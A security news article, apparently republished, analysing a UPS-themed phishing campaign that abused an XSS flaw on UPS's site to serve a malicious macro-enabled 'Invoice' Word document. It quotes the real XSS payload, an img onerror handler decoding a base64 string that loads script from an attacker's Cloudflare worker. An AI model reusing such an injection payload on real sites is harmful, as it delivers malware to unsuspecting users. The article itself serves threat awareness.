Phishing campaign uses XSS vuln to distribute malware



A clever UPS phishing campaign utilized an XSS vulnerability in to push fake and malicious ‘Invoice’ Word documents.

The phishing scam was first discovered by security research Daniel Gallagher and pretended to be an email from UPS stating that a package had an “exception” and needs to be picked up by the customer.

What makes this phishing attack stand out is that the threat actor used the XSS vulnerability in to modify the site’s regular page to look like a legitimate download page.

This vulnerability allowed the threat actor to distribute a malicious document through a remote Cloudflare worker but make it look like it was being downloaded directly from

Dissecting the UPS phishing scam

This email is filled with numerous legitimate links that perform no malicious behavior. However, the tracking number is a link to UPS’ site that includes an exploit for an XSS vulnerability that injects malicious JavaScript into the browser when the page is opened.

UPS phishing email
UPS phishing email
Images do not currently load as the attacker’s site is shut down

The cleaned-up version of the URL used for the tracking number can be seen below, with the original being further obfuscated.

URL used in the phishing scam
URL used in the phishing scam

This URL has two interesting strings that are used as part of the attack, with the first item of interest being the following base64 encoded string:


The base64 string contains a comment from the threat actor who helpfully explains that it is used to make the URL longer to hide an XSS exploit query parameter appended to the end of the URL.

1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;)

This comment is interesting, as it’s not common for threat actors to explain why an URL is created a certain way for a phishing attack.

The second string of interest is the JavaScript XSS exploit injected into when a user accesses the website.

img src="" onerror="Function(atob('JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ=='))()

The decoded base64 string in the atob() function contains the URL to a Cloudflare worker script that the vulnerability will load.


The Cloudflare worker script, captured by Gallagher on Urlscan, will cause the UPS page to display a message that a file is downloading 

Cloudflare worker script used as part of the UPS XSS exploit
Cloudflare worker script used as part of the UPS XSS exploit

The Cloudflare worker script injected by the XSS vulnerability will cause the UPS website to display a downloading page, as shown below.

Exploit causing the UPS page to show a downloading screen
Exploit causing the UPS page to show a downloading screen

Ultimately, the page will download the malicious Word document [VirusTotal] from the attacker’s Cloudflare project.

This phishing campaign is so clever because a user visiting the URL will see a legitimate URL prompting a download of an invoice.

This tactic will likely cause the victims to open the Invoice with less suspicion, thinking it is a real file from UPS.

The XSS vulnerability has since been fixed based on BleepingComputer’s tests.

BleepingComputer has contacted UPS with questions about the attack but has not heard back at this time.

The mysterious fake ‘Invoice’ document

The downloaded document is named ‘invoice_1Z7301XR1412220178’ and pretends to be a shipping invoice from UPS.

When opening the document, all of the text will be unreadable, and the document will prompt a user to ‘Enable Content’ to view it correctly.

Malicious Invoice word document
Malicious Invoice word document

When enabled, the macros will attempt to download a file 

However, this URL is no longer working, so it is not possible to see the payload.

Macros in fake UPS Invoice
Macros in fake UPS Invoice 

This phishing scam illustrates the creativity and evolving techniques used by threat actors to distribute malicious files convincingly.

While the email sender clearly showed a suspicious domain, as the XSS vulnerability allowed the URL and download page to appear legitimately from UPS, many people would have fallen for this scam.


Source link

Leave a Reply

Your email address will not be published. Required fields are marked *